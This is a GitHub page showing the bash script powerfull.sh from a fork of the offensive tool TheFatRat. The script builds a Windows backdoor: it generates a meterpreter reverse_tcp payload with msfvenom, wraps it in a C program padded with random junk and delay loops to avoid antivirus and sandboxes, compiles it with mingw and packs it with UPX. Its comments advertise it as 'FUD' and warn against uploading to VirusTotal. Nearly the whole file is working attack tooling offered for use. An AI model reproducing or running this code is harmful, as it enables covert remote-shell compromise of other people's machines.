forked from screetsec/TheFatRat
-
Notifications
You must be signed in to change notification settings - Fork 0
/
powerfull.sh
380 lines (333 loc) · 10.2 KB
/
powerfull.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
#!/bin/bash
file="config/config.path"
if [ -f "$file" ]
then
msfconsole=$(sed -n 13p ${file})
msfvenom=$(sed -n 14p ${file})
backdoor=$(sed -n 15p ${file})
searchsploit=$(sed -n 16p ${file})
output=$(sed -n 17p ${file})
else
echo "Configuration file does not exists , run setup.sh first ."
exit 1
fi
path=`pwd`
defcon=$path/config/conf.def
if [ -f "$defcon" ]
then
yourip=`sed -n 1p $defcon`
yourport=`sed -n 2p $defcon`
fi
function invalid1 ()
{
err=0
echo ""
if [ -z "$yourip" ]; then
echo -e $red ""
echo "[ ! ] You must write an IP or Hostname ."
echo -e $okegreen ""
echo "IP Example : 192.168.1.34
Domain Example : myhost.com"
err=1
fi
echo ""
if [ -z "$yourport" ]; then
echo -e $red ""
echo "[ ! ] You must write a port number between 1 & 65535 ."
err=1
fi
echo -e $okegreen ""
}
#get user local ip , public ip & hostname into variables
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
comp="0"
# Warn if the gcc-mingw32 package is not located here /usr/bin/i586-mingw32msvc-gcc
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
# check mingw if exists
which i686-w64-mingw32-gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]
then
echo [✔]::[mingw32]: installation found!;
comp="1"
fi
which x86_64-w64-mingw32-gcc > /dev/null 2>&1
if [ $? -eq 0 ]
then
echo [✔]::[mingw64]: installation found!;
if [ $comp == "0" ]
then
comp="2"
elif [ $comp == "1" ]
then
comp="3"
else
echo [x]::[warning]:this script require mingw32 or mingw64 installed to work ;
echo ""
echo [!]::Run setup.sh to install mingw64 ;
sleep 2s
exit 1
fi
fi
# check upx if exists
which upx > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo [✔]::[Upx]: installation found!;
else
echo [x]::[warning]:this script require upx to work ;
echo ""
echo [!]::Run setup.sh to install upx ;
echo ""
sleep 2s
exit 1
fi
###################################################################################################
# FatRat Coded By Screetsec ( Edo Maland )
# Program to create a C program after it is compiled that will bypass most AV
# Test in Kali Linux :)
# Very Slow to create Backdoor But Very powerfull for bypass AV
# Easy to Use
# FUD for popular Antivirus :)
# Dont Upload to virus total
####################################################################################################
#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
clear
SERVICE=service;
#This colour
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
yellow='\e[1;33m'
orange='\e[38;5;166m'
rm -f $output/Powerfull.exe >/dev/null 2>&1
rm -f $output/Powerfull-fud.exe >/dev/null 2>&1
#Banner
clear
echo
echo -e $yellow""
echo " =========================================================================="
echo -e $okegreen" FatRat Coded By Screetsec ( Edo -Maland- ) "
echo
echo -e $yellow" / __/ /__ _ __ / _ )__ __/ /_ / _ \___ _ _____ ____/ _/_ __/ / / "
echo " _\ \/ / _ \ |/|/ / / _ / // / __/ / ___/ _ \ |/|/ / -_) __/ _/ // / / / "
echo " /___/_/\___/__,__/ /____/\_,_/\__/ /_/ \___/__,__/\__/_/ /_/ \_,_/_/_/ "
echo""
echo -e $okegreen" This program compiles a C program with a meterpreter reverse_tcp payload "
echo " In it that can then be executed on a windows host "
echo " Program to create a C program after it is compiled that will bypass most AV "
echo -e $yellow" =========================================================================="
echo -e $okegreen""
#input lhost and lport
echo -e $okegreen""
echo -e $yellow "Your local IPV4 address is : $lanip"
echo -e $yellow "Your local IPV6 address is : $lanip6"
echo -e $yellow "Your public IP address is : $publicip"
echo -e $yellow "Your Hostname is : $hostn"
echo -e $okegreen ""
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
invalid1
if [ $err == "1" ]
then
echo -e $okegreen ""
echo -n "Press any key to restart again ."
read inp
./powerfull.sh
fi
echo ""
if [ $comp == "1" ]
then
COMPILER="i686-w64-mingw32-gcc"
fi
if [ $comp == "2" ]
then
COMPILER="x86_64-w64-mingw32-gcc"
fi
if [ $comp == "3" ]
then
echo ""
echo -e $yellow "You can compile this FUD for 32bit or 64bit windows machines"
echo ""
echo -e $green "Choose one of the following options"
echo -e $orange "+-------------------------------+"
echo -e $orange "|$white [$green 1$white ] $yellow Compile 32bit FUD Exe $orange |"
echo -e $orange "|$white [$green 2$white ] $yellow Compile 64bit FUD Exe $orange |"
echo -e $orange "+-------------------------------+"
echo ""
echo -ne $green "Choose (1 or 2) : " ;tput sgr0
read archs
case $archs in
1)
COMPILER="i686-w64-mingw32-gcc"
echo ""
echo -e $green "32bit Selected"
sleep 1
;;
2)
COMPILER="x86_64-w64-mingw32-gcc"
echo ""
echo -e $green "64bit Selected"
sleep 1
;;
*)
COMPILER="x86_64-w64-mingw32-gcc"
echo ""
echo -e $green "Invalid Option , setting 32bit as default"
sleep 1
;;
esac
fi
echo -e $okegreen
payload="windows/meterpreter/reverse_tcp"
msfvenomBadChars="\x00\xff"
msfvenomEncoder="x86/shikata_ga_nai"
msfvenomIterations="3" # Recommended value: 3
randomness=3517 # The higher the randomness the more padding is added to the c program increasing the binaries size
delayRandomness=32676 # The higher the delay the longer it will take to execute the payload, may increase your chances of escaping a sandbox
#Set directory
currentDir=`pwd`
outputDir="$output/"
outputExe="${outputDir}Powerfull.exe" # You can change the name of the executable on this line
outputUPX="${outputDir}Powerfull-fud.exe" # You can change the name of the executable on this line
cProg="${currentDir}/prog.c"
cProgTemp="${currentDir}/prog.c.temp"
# Create some padding to be compiled in the C program this adds randomness to the binary
function old_generatePadding {
counter=0
randomNumber=$((RANDOM%${randomness}+7))
while [ $counter -lt $randomNumber ]; do
echo "" >> $cProg
randomCharnameSize=$((RANDOM%5+12))
randomPaddingSize=$((RANDOM%1024+2048))
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c ${randomPaddingSize}`
echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> $cProg
let counter=counter+1
done
}
function generatePadding {
paddingArray=(0 1 2 3 4 5 6 7 8 9 a b c d e f)
counter=0
randomNumber=$((RANDOM%${randomness}+23))
while [ $counter -lt $randomNumber ]; do
echo "" >> $cProg
randomCharnameSize=$((RANDOM%10+7))
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
echo "unsigned char ${randomCharname}[]=" >> $cProg
randomLines=$((RANDOM%20+13))
for (( c=1; c<=$randomLines; c++ ))
do
randomString="\""
randomLength=$((RANDOM%11+7))
for (( d=1; d<=$randomLength; d++ ))
do
randomChar1=${paddingArray[$((RANDOM%15))]}
randomChar2=${paddingArray[$((RANDOM%15))]}
randomPadding=$randomChar1$randomChar2
randomString="$randomString\\x$randomPadding"
done
randomString="$randomString\""
if [ $c -eq ${randomLines} ]; then
echo "$randomString;" >> $cProg
else
echo $randomString >> $cProg
fi
done
let counter=counter+1
done
}
# Check to see the output directory exists
if [[ ! -d "$outputDir" ]]; then
mkdir $outputDir
fi
echo ""
echo "You may see multiple errors until the executable is compiled successfully."
echo ""
if [[ $msfvenomIterations > 3 ]]; then
echo "Most of the errors are due to the msfvenom iterations value is set too high."
echo "Recommended value: msfvenomIterations=3"
fi
echo ""
# Check to see if the executable was previously created
if [[ -f "$outputExe" ]]; then
echo "Remove the executable at ${outputExe} to recreate it."
echo ""
fi
sleep 2
# Until the Powerfull.exe is compiled successfully loop until it is
while [[ ! -f "$outputExe" ]]; do
# Delete the c program and recreate it
rm -f $cProg
generatePadding
echo "" >> $cProg
echo "int main(void)" >> $cProg
echo "{" >> $cProg
# Introduce a couple of processing loops for a delay
echo "" >> $cProg
echo "int zewd5 = 1, rqs3 = 1;" >> $cProg
echo "for ( zewd5 = 1 ; zewd5 <= ${delayRandomness} ; zewd5++ )" >> $cProg
echo " for ( rqs3 = 1 ; rqs3 <= ${delayRandomness} ; rqs3++ )" >> $cProg
echo " {}" >> $cProg
echo "" >> $cProg
generatePadding
echo "" >> $cProg
$msfvenom -p ${payload} LHOST=$yourip LPORT=$yourport -b ${msfvenomBadChars} -e ${msfvenomEncoder} -i ${msfvenomIterations} -f c >> $cProg
generatePadding
echo "" >> $cProg
echo "((void (*)())buf)();" >> $cProg
echo "" >> $cProg
generatePadding
echo "" >> $cProg
echo "}" >> $cProg
randomBufNameSize=$((RANDOM%10+23))
randomBufName=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomBufNameSize}`
cat $cProg | sed "s/buf/${randomBufName}/g" > $cProgTemp
mv -f $cProgTemp $cProg
# To install the following program on Kali Linux - "apt-get install gcc-mingw32"
$COMPILER -o $outputExe $cProg
done
if [[ -f "$outputExe" ]]
then
echo "Uncompressed backdoor created in : $outputExe"
else
echo "Unable to compile backdoor"
echo -n "Press Enter to return to menu"
read rsp
exit 0
fi
echo ""
echo -n "Compressing $outputExe with UPX to be less detectable ...."
# Use UPX to create a second executable, testing...
upx -q --ultra-brute -o $outputUPX $outputExe >/dev/null 2>&1
echo "Done"
if [[ -f "$outputUPX" ]]
then
echo "Compressed Backdoor was build in : $outputUPX"
echo ""
echo -n "Press Enter to return to fatrat menu"
read rsp
exit 0
else
echo "Unable to compress $outputExe with UPX"
echo -n "Press Enter to return to fatrat menu"
read rsp
exit 0
fi